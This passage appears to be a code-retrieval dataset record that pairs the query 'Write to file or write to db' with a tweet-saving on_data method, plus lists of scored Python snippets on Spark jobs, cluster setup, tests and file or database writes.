[self._urlpath]]\n ]\n sh = SparkHolder(True, args, {})\n return sh.setup()", "def execute(self):\n try:\n spark_context = self.spark.sparkContext\n spark_context.addFile(self.location)\n return self.spark.read.format(self.file_format) \\\n .load(SparkFiles.get(self.location.split('/')[-1]))\n except AnalysisException as exp:\n raise", "def main(config: DictConfig) -> None:\n\n if config.test:\n # TODO: clean up current working directory with test=true\n experiment_path = os.getcwd().replace(\"test=true,\", \"\").replace(\"test=True,\", \"\")\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n summary, report = trainer.test()\n print(summary)\n print(report)\n else:\n experiment_path = os.getcwd()\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n trainer.run()\n print(\"Launched training. Press CTRL+C to stop.\")\n print(f\"Logs available at {os.getcwd()}\")", "def emr_run_spark():\n\n try:\n response = emr.run_job_flow(\n Name=\"Lab Spark Cluster\",\n LogUri=log_uri,\n ReleaseLabel='emr-5.28.0',\n Instances={\n 'MasterInstanceType': 'm5.xlarge',\n 'SlaveInstanceType': 'r5.2xlarge',\n 'InstanceCount': 4,\n 'KeepJobFlowAliveWhenNoSteps': True,\n 'TerminationProtected': False,\n 'Ec2SubnetId': subnet_id,\n 'EmrManagedMasterSecurityGroup': master_sg,\n 'EmrManagedSlaveSecurityGroup': slave_sg,\n 'ServiceAccessSecurityGroup': service_access_sg\n },\n Applications=[\n {\n 'Name': 'Spark'\n }\n ],\n BootstrapActions=[\n {\n 'Name': 'Maximize Spark Default Config',\n 'ScriptBootstrapAction': {\n 'Path': 's3://support.elasticmapreduce/spark/maximize-spark-default-config',\n }\n },\n {\n 'Name': 'Install boto3',\n 'ScriptBootstrapAction': {\n 'Path': f's3://{lab_bucket}/spark/conf/install_python_modules.sh',\n }\n }\n ],\n Steps=[\n {\n 'Name': 'Setup Debugging',\n 'ActionOnFailure': 'TERMINATE_CLUSTER',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['state-pusher-script']\n }\n },\n {\n 'Name': 'setup - copy files',\n 'ActionOnFailure': 'CANCEL_AND_WAIT',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['aws', 's3', 'cp', f's3://{lab_bucket}/spark/main.py', '/home/hadoop/']\n }\n },\n {\n 'Name': 'Run Spark',\n 'ActionOnFailure': 'CANCEL_AND_WAIT',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['spark-submit', '/home/hadoop/main.py', lab_bucket, s3_data_repo]\n }\n }\n ],\n Configurations=[\n {\n 'Classification': 'spark-env',\n \"Configurations\": [\n {\n \"Classification\": \"export\",\n \"Properties\": {\n \"PYSPARK_PYTHON\": \"/usr/bin/python3\"\n }\n }\n ]\n }\n ],\n VisibleToAllUsers=True,\n JobFlowRole='EMR_EC2_DefaultRole',\n ServiceRole='EMR_DefaultRole',\n Tags=[\n {\n 'Key': 'Project',\n 'Value': 'Data Lake Quickstart'\n },\n {\n 'Key': 'Prefix',\n 'Value': prefix_name\n }\n ]\n )\n\n return response\n\n except ClientError as error:\n logger.error(\"The error occurred when configure emr to run spark\")\n logger.exception(error)", "def main():\n driver = Driver()\n driver.start()", "def main():\n\n # Chdir into script directory so to properly resolve relative paths in configuration\n os.chdir(os.path.dirname(os.path.realpath(__file__)) + \"/\")\n\n # Disable proxy as we access localhost, both to avoid overhead and issues with proxy misconfiguration\n os.environ['NO_PROXY'] = '*'\n\n # Stop any GraphDB server that we previously started and is possibly still around due to script interruption/crash\n shell(f\"{cmd_graphdb} stopall\")\n\n # Generate synthetic traces, both for populating the repositories and for the {sf, sp, pf, pp} tests\n prepare_traces()\n \n # Generate central repositories (if needed)\n for size, approach in itertools.product(sizes, approaches):\n prepare_repository(size, approach)\n \n # Run experiments (if needed)\n for size, approach in itertools.product(sizes, approaches):\n run_experiments(size, approach)", "def create_spark_session():\n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID']) \\\n .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY']) \\\n .enableHiveSupport().getOrCreate()\n \n return spark", "def test_srnaseq_star(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"test_srnaseq\"),\n os.path.join(data_dir, \"run_info-srnaseq_star.yaml\")]\n subprocess.check_call(cl)", "def test_spark_read_file_csv(spark):\n path = os.getcwd() + '/data_processor/tests/test_data/test.csv'\n read_df = IOHandler(spark).spark_read_file(file_path=path)\n assert read_df.count() == 2", "def init_test_env(setting_path, output_path, file_list,fname_list):\n dm_json_path = os.path.join(setting_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_path, 'cur_task_setting.json')\n assert os.path.isfile(tsm_json_path), \"task setting not exists\"\n dm = DataTask('task_reg', dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg', tsm_json_path)\n file_num = len(file_list)\n os.makedirs(os.path.join(output_path, 'seg/test'), exist_ok=True)\n os.makedirs(os.path.join(output_path, 'seg/res'), exist_ok=True)\n file_txt_path = os.path.join(output_path, 'seg/test/file_path_list.txt')\n fn_txt_path = os.path.join(output_path, 'seg/test/file_name_list.txt')\n has_label = len(file_list[0])==2\n if fname_list is None:\n if has_label:\n fname_list = [get_file_name(file_list[i][0]) for i in range(file_num)]\n else:\n fname_list = [get_file_name(file_list[i]) for i in range(file_num)]\n write_list_into_txt(file_txt_path, file_list)\n write_list_into_txt(fn_txt_path, fname_list)\n data_task_name = 'seg'\n cur_task_name = 'res'\n if dm is not None:\n dm.data_par['datapro']['dataset']['output_path'] = output_path\n dm.data_par['datapro']['dataset']['task_name'] = data_task_name\n tsm.task_par['tsk_set']['task_name'] = cur_task_name\n tsm.task_par['tsk_set']['output_root_path'] = os.path.join(output_path, data_task_name)\n return dm, tsm", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def common_setup(ssh_client):\n with open_cfg() as cfg:\n delete_hdfs = cfg.getboolean('main', 'delete_hdfs')\n # preliminary steps required due to differences between azure and aws\n if c.PROVIDER == \"AZURE\":\n\n # todo only if first run\n if c.NUM_INSTANCE > 0 or True:\n print(\"In common_setup, NUM_INSTANCE=\" + str(c.NUM_INSTANCE))\n # add ssh key that matches the public one used during creation\n if not c.PRIVATE_KEY_NAME in ssh_client.listdir(\"/home/ubuntu/.ssh/\"):\n ssh_client.put(localpath=c.PRIVATE_KEY_PATH, remotepath=\"/home/ubuntu/.ssh/\" + c.PRIVATE_KEY_NAME)\n ssh_client.run(\"chmod 400 /home/ubuntu/.ssh/\" + c.PRIVATE_KEY_NAME)\n\n # ssh_client.run(\"sudo groupadd supergroup\")\n ssh_client.run(\"sudo usermod -aG supergroup $USER\")\n ssh_client.run(\"sudo usermod -aG supergroup root\")\n\n # join docker group\n ssh_client.run(\"sudo usermod -aG docker $USER\")\n\n ssh_client.run(\"mkdir /usr/local/spark/spark-events\")\n\n # ssh_client.run(\"sudo chmod -R 777 /mnt\")\n\n # to refresh groups\n ssh_client.close()\n ssh_client.connect()\n\n # restore environmental variables lost when creating the image\n ssh_client.run(\"echo 'export JAVA_HOME=/usr/lib/jvm/java-8-oracle' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_INSTALL=/usr/local/lib/hadoop-2.7.2' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/bin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/sbin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_MAPRED_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HDFS_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export YARN_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_LIB_NATIVE_DIR=$HADOOP_INSTALL/lib/native/' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_OPTS=\\\"-Djava.library.path=$HADOOP_INSTALL/lib/native\\\"' >> $HOME/.bashrc\")\n ssh_client.run(\n \"echo 'export LD_LIBRARY_PATH=$HADOOP_INSTALL/lib/native:$LD_LIBRARY_PATH' >> $HOME/.bashrc\") # to fix \"unable to load native hadoop lib\" in spark\n\n ssh_client.run(\"source $HOME/.bashrc\")\n\n if c.PROVIDER == \"AWS_SPOT\":\n ssh_client.run(\"echo 'export JAVA_HOME=/usr/lib/jvm/java-8-oracle' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_INSTALL=/usr/local/lib/hadoop-2.7.2' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/bin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/sbin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_MAPRED_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HDFS_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export YARN_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_LIB_NATIVE_DIR=$HADOOP_INSTALL/lib/native' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_OPTS=\\\"-Djava.library.path=$HADOOP_INSTALL/lib/native\\\"' >> $HOME/.bashrc\")\n ssh_client.run(\n \"echo 'export LD_LIBRARY_PATH=$HADOOP_INSTALL/lib/native:$LD_LIBRARY_PATH' >> $HOME/.bashrc\") # to fix \"unable to load native hadoop lib\" in spark\n ssh_client.run(\"source $HOME/.bashrc\")\n \n ssh_client.run(\"export GOMAXPROCS=`nproc`\")\n\n if c.UPDATE_SPARK_DOCKER:\n print(\" Updating Spark Docker Image...\")\n ssh_client.run(\"docker pull elfolink/spark:2.0\")\n\n if delete_hdfs:\n ssh_client.run(\"sudo umount /mnt\")\n ssh_client.run(\n \"sudo mkfs.ext4 -E nodiscard \" + c.TEMPORARY_STORAGE + \" && sudo mount -o discard \" + c.TEMPORARY_STORAGE + \" /mnt\")\n\n ssh_client.run(\"test -d /mnt/tmp || sudo mkdir -m 1777 /mnt/tmp\")\n ssh_client.run(\"sudo mount --bind /mnt/tmp /tmp\")\n\n ssh_client.run('ssh-keygen -f \"/home/ubuntu/.ssh/known_hosts\" -R localhost')\n\n print(\" Stop Spark Slave/Master\")\n # ssh_client.run('export SPARK_HOME=\"{s}\" && {s}sbin/stop-slave.sh'.format(s=c.SPARK_HOME))\n ssh_client.run('export SPARK_HOME=\"{s}\" && {s}sbin/stop-master.sh'.format(s=c.SPARK_HOME))\n ssh_client.run('export SPARK_HOME=\"{s}\" && sudo {s}sbin/stop-slave.sh'.format(s=c.SPARK_HOME))\n \n stdout, stderr, status = ssh_client.run(\n \"cd \" + c.SPARK_HOME + \" && cp conf/log4j.properties.template conf/log4j.properties\")\n print(stdout, stderr)\n print(\" Set Log Level\")\n ssh_client.run(\n \"sed -i '19s/.*/log4j.rootCategory={}, console /' {}conf/log4j.properties\".format(c.LOG_LEVEL,\n c.SPARK_HOME))\n if c.KILL_JAVA:\n print(\" Killing Java\")\n ssh_client.run('sudo killall java && sudo killall java && sudo killall java')\n\n print(\" Kill SAR CPU Logger\")\n ssh_client.run(\"screen -ls | grep Detached | cut -d. -f1 | awk '{print $1}' | xargs -r kill\")\n\n if c.SYNC_TIME:\n print(\" SYNC TIME\")\n ssh_client.run(\"sudo ntpdate -s time.nist.gov\")\n\n print(\" Removing Stopped Docker\")\n ssh_client.run(\"docker ps -a | awk '{print $1}' | xargs --no-run-if-empty docker rm\")", "def main():\n sc = pyspark.SparkContext(conf=sparkConf())\n sql = pyspark.SQLContext(sc)\n args = parse_args()\n cleanOutputDir(args.output)\n users = os.listdir(args.input)\n map(lambda user: parseUser(user, args, sql, args.partitions), users)\n corpora_stats(args.output)\n append_corpus(args.output)", "def main(self, sc: SparkContext, *args):\n mgi_strain_report_path = args[0]\n output_path = args[1]\n\n spark = SparkSession(sc)\n\n strain_df: DataFrame = extract_tsv(\n spark, mgi_strain_report_path, schema=STRAIN_SCHEMA, header=False\n )\n strain_df.write.mode(\"overwrite\").parquet(output_path)", "def run(self, config):\n transformer = hadoop_csv_transformer.HadoopCsvTransformer(config)\n transformer.StartTransform()", "def spark_config_reset(is_spark_submit):\n if is_spark_submit:\n sc.stop()\n print \"End of the job!\"", "def test_first_run():\n setup_first_run(\".\", True, extra_context={\"number_of_iterations\": 2, \n \"project_name\": \"first_run_test\",\n \"logging_frequency\": 1,\n \"enable_cuda\": False\n })\n\n generated_project_dir = Path(\"first_run_test\")\n assert generated_project_dir.is_dir()\n assert (generated_project_dir / \"facades\" / \"train\" / \"A\" ).is_dir()\n assert (generated_project_dir / \"facades\" / \"train\" / \"B\" ).is_dir()", "def process_test_start(self, config, results, result_id, db):\n pass", "def __init__(self, spark, logger):\n self.spark = spark\n self.logger = logger", "def start_test_exec(cls):\n time_str = cls.get_current_time()\n os.system(\"robot -l ./logs/log_{0}.html -r ./logs/report_{0}.html -o ./logs/output_{0}.xml \\\n ./test_suite/{1}\".format(time_str, test_suite))" ]
[ "0.77397996", "0.70026386", "0.68174267", "0.68167377", "0.6324946", "0.632194", "0.63131744", "0.62284076", "0.61973965", "0.6191538", "0.615016", "0.61465317", "0.6010293", "0.5978047", "0.59729236", "0.59613144", "0.59418756", "0.5929893", "0.5851277", "0.5777042", "0.57738715", "0.5762342", "0.57530385", "0.5751811", "0.5738633", "0.5706134", "0.5672585", "0.56560445", "0.562517", "0.5595054", "0.55949837", "0.55782855", "0.5572695", "0.5539492", "0.5518825", "0.55187565", "0.55168784", "0.55148244", "0.54688704", "0.54685193", "0.54658264", "0.5461699", "0.5423668", "0.54143584", "0.54031396", "0.53869224", "0.5377008", "0.53746927", "0.5372838", "0.53365767", "0.5333173", "0.5327857", "0.53192997", "0.5303515", "0.52948487", "0.52789414", "0.52024406", "0.51942897", "0.5183699", "0.51818955", "0.5172643", "0.5172483", "0.51673305", "0.51608825", "0.51560694", "0.5154963", "0.51362044", "0.51344955", "0.513435", "0.5125955", "0.5122752", "0.5118688", "0.5115201", "0.5111694", "0.51105577", "0.5099745", "0.5098707", "0.50903696", "0.5086317", "0.5082859", "0.507956", "0.5074343", "0.50695133", "0.50681657", "0.50583786", "0.5048103", "0.5047962", "0.5036374", "0.50328684", "0.50300443", "0.50296104", "0.502688", "0.5024736", "0.5023967", "0.5016583", "0.50141174", "0.5013146", "0.50103813", "0.49974713", "0.49968344" ]
0.50840384
79
Write to file or write to db
def on_data(self, tweet): if (time.time() - self.start_time) < self.limit: self.saveFile.write(tweet) return True else: self.saveFile.close() return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, **kwargs):\n # First, attempt to update the local store\n self.update()\n # Only get here if the file doesn't already exist\n with open(self._db_file, 'w') as fp:\n json.dump(self.to_dict(\"JSON\"), fp, **kwargs)", "def writedb(path, key, value) -> int:\n if key == \"\" or value == \"\":\n return 1\n if os.path.exists(path):\n pass \n else:\n return 1\n with open(path, \"a\") as db:\n db.write(f\"\\n{key}:{value}\")\n return 0", "def write_db(self, data, update=True):\n if update:\n self.read_db()\n self.data[self.key].append(data)\n try:\n with open(self.filename, 'w+') as database:\n json.dump(self.data, database, indent=2)\n except json.JSONDecodeError as err:\n raise err", "def _write(self, data):\n self.db.append(data)\n\n with open(self.DB_FILE, 'w') as outfile:\n json.dump(self.db, outfile)", "def write_data():", "def save(self):\r\n debug.write(\"[SourceRPG] Handling SQL Save\", 1)\r\n if self.path != \":memory:\":\r\n debug.write(\"Path is not in memory\", 2, False)\r\n if currentTurboMode is False:\r\n debug.write(\"We are not in turbo mode\", 2, False)\r\n self.connection.commit()\r\n debug.write(\"[SourceRPG] SQL Save handled\", 1)", "def writeFile( self, file_handle=None, table_name=None, data=None ):\n\n # Record the next primary key id.\n nextId = self.nextPrimaryKey( table_name )\n\n # Generate the string list of data to be written in the file.\n values = '\\t'.join( data )\n\n # Actual put together the primary key id, the string values and the new line character to be writen in the file.\n insert = str(nextId) + '\\t' + str(values) + \"\\n\"\n\n # Write the stuff in the file.\n file_handle.write( insert )\n\n # DON'T MESS WITH THAT!!!!! YOU'RE WARNED!!!\n # Messing with this cute id will kill your importer because the table relationships files relies on that!!!\n # Take a look on the lines like 'taxonomiesInserted' or 'proteinsInserted'.\n return nextId", "def write(self):\n db_handle = open(settings.DATA_PATH, 'wb')\n cPickle.dump(dict(self), db_handle)\n db_handle.close()", "def write_to_file(self, filename: str) -> None:", "def write_db(db):\n with open(db_file, 'w') as f:\n json.dump(db, f, indent=4)", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write(self, fname):\n pass", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def _batch_write(self):\n if self.to_put:\n db.put(self.to_put)\n self.to_put = []\n if self.to_delete:\n db.delete(self.to_delete)\n self.to_delete = []", "def save_db(self) -> None:", "def file_write(stuff, file_path):\n with open(file_path, \"wt\") as fo:\n fo.write(stuff)", "def write_to(self, fname, **kwargs):\n data = self.to_Table()\n data.write(fname, **kwargs)", "def write(data):", "def saveOnFile(self, path, data):\n with open(path, \"w\") as f:\n f.write(data)", "def db_for_write(self, model, **hints):\n return None", "def write(cls, file, data):\n file.write(data)", "def write( data ):", "def write (self, path):\n\t\ts=[]; add=s.append\n\t\tadd ('\\t'.join (self.schema))\n\t\tfor record in self.data:\n\t\t\tadd (record.asTabDelimitedRecord())\n\t\t\n\t\t# f = open (path, 'w')\n\t\tf = codecs.open(path, 'w', 'utf-8')\n\t\tf.write (self.linesep.join (s))\n\t\tf.close()\n\t\tprint (\"data written to \" + path)", "def write(self):\n if not self._table: raise ValueError ( \"_table is Null\" )\n if self._isnew:\n for m in self._modified_values:\n self._modified_values[m] = self._table[m].val_py2sql(self._modified_values[m])\n \n try:\n rec = CFG.CX.insert ( CFG.DB.SCHEMA + \".\" + self._table.name,\n self._modified_values )\n #this will automatically re-read the data from the db, to take all changes\n #done by triggers and default values into account.\n self._objectid = rec['objectid']\n\n #print \"Record # {0} inserted into {1}.\".format(self._objectid, self._table.name)\n self.raiseEvent ( \"record_added\", self )\n \n except pg.DatabaseError, e:\n print \"Error inserting record.\"\n raise Record.DataManipulationError ( \"Inserting a new record into '{0}'\".format(self._table.name),\n str(self._modified_values),\n e)\n elif self._ismodified:\n \n for m in self._modified_values: \n self._modified_values[m] = self._table[m].val_py2sql(self._modified_values[m])\n \n self._modified_values['objectid'] = self._objectid\n del self.TextCache[self._objectid]\n try:\n rec = CFG.CX.update ( CFG.DB.SCHEMA + \".\" + self._table.name,\n self._modified_values )\n self.read() \n self.raiseEvent ( \"record_saved\", self )\n except pg.DatabaseError, e:\n print \"Error updating record\"\n raise Record.DataManipulationError ( \"Updating record {1} of '{0}'\".format(self._table.name, self._objectid),\n str(self._modified_values),\n e)", "def write_file_set(self, write_file):\n self._write_file = write_file", "def _write_to_datastore(self, index, doc_type, document, login, path):\n if self.config['Github']['datastore'] == 'filesystem':\n filename = self._generate_filename(doc_type, login)\n self._save_file(json.dumps(document), path, filename)\n elif self.config['Github']['datastore'] == 'elasticsearch':\n self._save_elasticsearch(document, index, doc_type)\n elif self.config['Github']['datastore'] == 'both':\n filename = self._generate_filename(doc_type, login)\n self._save_file(json.dumps(document), path, filename)\n self._save_elasticsearch(document, index, doc_type)\n else:\n error_msg = \"Unable to save result data for {}. Check \" \\\n \" configuration file setting: {}\" \\\n .format(doc_type, self.config['Github']['datastore'])\n self.logger.error(error_msg)", "def test_write_data(dbh):\n mock_path = '/tmp/test.json'\n if os.path.exists(mock_path):\n os.remove(mock_path)\n assert not os.path.isfile(mock_path)\n assert dbh.write_data(mock_path)\n assert os.path.isfile(mock_path)", "def write(self, filename, data):\n raise NotImplementedError", "def save(self, data):\n self.write(data)", "def writeToDB(self, eventDateTime, eventFileName, eventType, eventPath):\n conn = self.createConnection()\n c = conn.cursor()\n\n c.execute(\"INSERT INTO RansomedFiles (TIME, EventFileName, EventType, EventPath) VALUES (?,?,?,?)\", (eventDateTime, eventFileName, eventType, eventPath))\n conn.commit()\n conn.close()\n\n # print(\"[+]Wrote to the database successfully!\")", "def write_to_db( self, *args ):\n try:\n toSave = [ a for a in args ]\n # save them\n self.session.add_all( toSave )\n self.session.commit()\n self._fire_save_notification()\n return True\n except Exception as e:\n print( \"Error : %s\" % e )\n self._fire_error_saving_notification( e )\n return False", "def write_db(db):\n\n # Look for database in the same folder as this script\n script_dir = os.path.dirname(os.path.realpath(__file__))\n db_filepath = os.path.join(script_dir, 'cn_loads_database.dat')\n\n with open(db_filepath, 'w') as f:\n f.write(yaml.dump(db, default_flow_style=False))", "def writedata(self,filename_): # 3\n res = self.__obj.writedata(filename_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)", "def write_database(self, updated_database):\n self.database_lock.acquire()\n try:\n json.dump(updated_database, open(self.database_name, \"w\"))\n except Exception as e:\n print(e)\n assert False, 'Unable to write database'\n finally:\n self.database_lock.release()", "def dbWrite(dbPoint, formatedValue):\n raise NotImplementedError('dbWrite in simu mode')", "def _writeRecord(self, path, name, data):\n file_path = os.path.join(path, name)\n with open(file_path, 'w') as f:\n for item in data:\n f.write(str(item)+'\\t')\n f.write('\\n')", "def write(self,path,content):\n file_path = os.path.join( self.directory, path)\n with open(file_path, \"w\") as file:\n file.write( content )", "def write(self, content):\n ...", "def save(self, db):\n pass", "def fs_write(obj, file_path):\n try:\n with open(str(file_path), 'w') as f:\n f.write(obj)\n return obj\n except TypeError as e:\n raise e", "def enablewrite(self):\n if self.mode == 'write':\n return\n self.file.close()\n self.mode = 'write'\n self._load_file()", "def write_to_database(info,timer):\n\n inserts = create_sql_write(info,timer)\n\n connection = engine.connect()\n for insert in inserts:\n connection.execute(insert)\n connection.close()", "def write():\n pass", "def write(self, data_to_write, overwrite=False):\n\n if data_to_write is not None and isinstance(data_to_write, str):\n if overwrite or not path.isfile(self.file):\n with open(self.file, \"w\", encoding=\"utf-8\") as file:\n file.write(data_to_write)\n else:\n with open(self.file, \"a\", encoding=\"utf-8\") as file:\n file.write(data_to_write)", "async def exec_write(self, query, *args):", "def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)", "def save_in_db(self):\n self.sql_database.table_name = self.table_db\n self.sql_database.db_name = self.db\n if self.sql_database.insert_item(text_path=self.path, word_first=self.word_1.get(),\n word_second=self.word_2.get(),\n word_third=self.word_3.get(), word_fourth=self.word_4.get(),\n word_fifth=self.word_5.get()):\n msg.showinfo(message=\"Done\")", "def write_to_file(file: Text, data: bytes):\n with open(file, \"wb\") as w:\n w.write(data)\n w.flush()", "def write(self, outfile, rebasings=None):\r\n raise NotImplementedError()", "def save(database, resource):\n # TODO\n pass", "def save_to(self, f: BinaryIO):\n raise NotImplementedError", "def write(self, path, content):\n this_file = open(path, 'w')\n this_file.write(content)\n this_file.close()", "def test1_write():\n with open(FILE_DIR + FILE_NAME, mode='w', encoding='utf-8') as f:\n f.write(DATA)", "def write_to_db( self ) :\n # first lets update the json file internally through: modify the path to figures\n # The json file has two keys: info and processes\n # we loop over all processes and we change the value of the key figure\n for proc in self.data[\"processes\"].keys():\n # for keys in self.data[\"processes\"][proc].keys():\n # each process has one figure\n try:\n # if keys == \"figure\":\n old_value = self.data[\"processes\"][proc][\"figure\"]\n new_value = self.datapath + \"/\" + old_value\n self.data[\"processes\"][proc][\"figure\"] = new_value\n except Exception as err:\n print( 'The key %s does not exist in the json file' % 'figure' )\n print( err )\n\n # Check the existence of the current json file inside the data base\n # the name of the json file starts with run_number as: run_number.json\n try:\n if self.collection.find_one({\"info.run\": {\"$eq\": self.run_number}}):\n # if the document with the given run number exists, delete it and re-write\n print( \"File %s already in database\" % self.data[\"info\"][\"filename\"] )\n self.collection.delete_one( {\"info.run\": {\"$eq\": self.run_number}} )\n self.collection.insert_one( self.data )\n\n else:\n print('File %s is going to be dumbed' % self.data[\"info\"][\"filename\"])\n self.collection.insert_one( self.data )\n\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print('the data base server is down')\n print(err)\n sys.exit('check the database server if it is up and running ?')\n\n return 0", "def write_gp_dbid(self):\n INFO = self.logger.info\n INFO('%s - write_gp_dbid' % self.filepath)\n\n if os.path.exists(self.filepath):\n INFO('found existing file')\n\n os.remove(self.filepath)\n INFO('removed existing file')\n\n self.logger.info('opening new file')\n with open(self.filepath, 'w') as f:\n self.format(f)\n\n INFO('setting read only')\n os.chmod(self.filepath, stat.S_IRUSR) # user read permissions (0400)\n\n INFO('verifying file')\n v = GpDbidFile(self.datadir, do_read=True)\n assert self.dbid == v.dbid\n assert self.standby_dbid == v.standby_dbid", "def write(file, text):\n with open(file, 'w') as f:\n f.write(text)", "def save(self):\n args = list(map(self._get_value_or_default, self.COLUMN_TO_FILED))\n columns = list(map(lambda k: k, self.COLUMN_TO_FILED))\n sql = 'INSERT INTO {} ({}) VALUES({});'.format(\n self.TABLE_NAME,\n ', '.join(columns),\n '%s,'.join(' '*len(columns)) + '%s'\n )\n cursor = yield self._pool.execute(sql, args)\n app_log.info('save arg %s', args)\n count = cursor.rowcount\n result = True if count == 1 else False\n return result", "def save_to_file(self, data):\n\t\tif self.data_file.write(data):\n\t\t\tprint(\"Data successfully added to file\")\n\t\telse:\n\t\t\tPrint(\"Problem occured during adding to file\")", "def write(self, id, data):\n return self._call('%s.update' % self._shopware_model,\n [int(id), data])", "def write_to_db(self, doc):\n self.db_connection[self.db_name][self.db_collection].insert_one(doc)", "def execute_write(function):\n raise NotImplementedError(\"execute_write() has not been implemented\")", "def write(*name):\n foo = Foo(' '.join(name))\n with open(DBNAME, 'w') as f:\n f.write(pickle.dumps(foo))", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, data):\n self.mycol.insert_one({\"query\":data})", "def write(self, data):\n return self._write(self.wfile, data)", "def saveDbToDisk (self):\n\n currentThread=threading.currentThread()\n self._logIo(\"save-db-to-disk\").debug1(\"starting to save db for instance %s. thread-id=%d\", self._instanceName, currentThread.ident)\n\n # We dump the dict to Json format\n try:\n a.infra.format.json.writeToFile(self._logIo, self._cidLastAccessTimeDict, self._dbFileFullNamePath)\n except Exception as ex:\n self._logIo(\"error-write-db-file\").error(\"error writing db to file='%s'. exception: %s\", self._dbFileFullNamePath, ex)\n\n # We dump prediction counters for presistency\n try:\n a.infra.format.json.writeToFile(self._logIo, self.counters, self._countersFileFullNamePath)\n except Exception as ex:\n self._logIo(\"error-write-counters-file\").error(\"error writing counters to file='%s'. exception: %s\", self._countersFileFullNamePath, ex)\n \n return self._dbFileFullNamePath, self._dbFailedToRemoveFileFullNamePath", "def write_to_database(database, table, data):\r\n in_tests.test_write_to_database_from_dict(database, table, data)\r\n print (f\" Insert or update data in `{database} > {table}`...\")\r\n\r\n connection = sqlite3.connect(database)\r\n cursor = connection.cursor()\r\n counter = 1\r\n query_columns = \", \".join(data.keys())\r\n query_values = f\"{'?, ' * len(data)}\"[:-2]\r\n query = \\\r\nf\"INSERT OR REPLACE INTO {table} ({query_columns}) VALUES ({query_values});\"\r\n cursor.execute(query, list(data.values()))\r\n connection.commit()\r\n database_changes = connection.total_changes\r\n cursor.close()\r\n connection.close()\r\n out_tests.test_write_to_database(database_changes, counter)\r\n return (database_changes)", "def write(self, content):\n pass", "def save_to_file(self, file_path):\n if file_path:\n f = open(file_path, 'w')\n for row in range(self.rows):\n f.write(''.join(self.data[row]) + '\\n')\n f.close()", "def save_to_file(self, file_path):\n if file_path:\n f = open(file_path, 'w')\n for row in range(self.rows):\n f.write(''.join(self.data[row]) + '\\n')\n f.close()", "def writeToFile(self, basedir, write_code=0):", "def write(self, arg, **kwargs):\r\n if hasattr(arg, 'seek'):\r\n self._tofile(arg, **kwargs)\r\n else:\r\n with open(arg, 'wb') as fid:\r\n self._tofile(fid, **kwargs)", "def write_log_to_db(data, error):\n data.content = error\n data.timestamp = Timestamp.timestamp()\n data.dataset = data.name\n log_to_db(data)", "def w(self, value):\n self.oFile.write(value)", "def write_table(table, file_path):\n\n\twith open(file_path, 'w') as file:\n\t\tfile.write(table)", "def write_student_to_db(cls, file_name, obj_list):\n conn = sqlite3.connect('database.db')\n c = conn.cursor()\n query = \"DELETE FROM 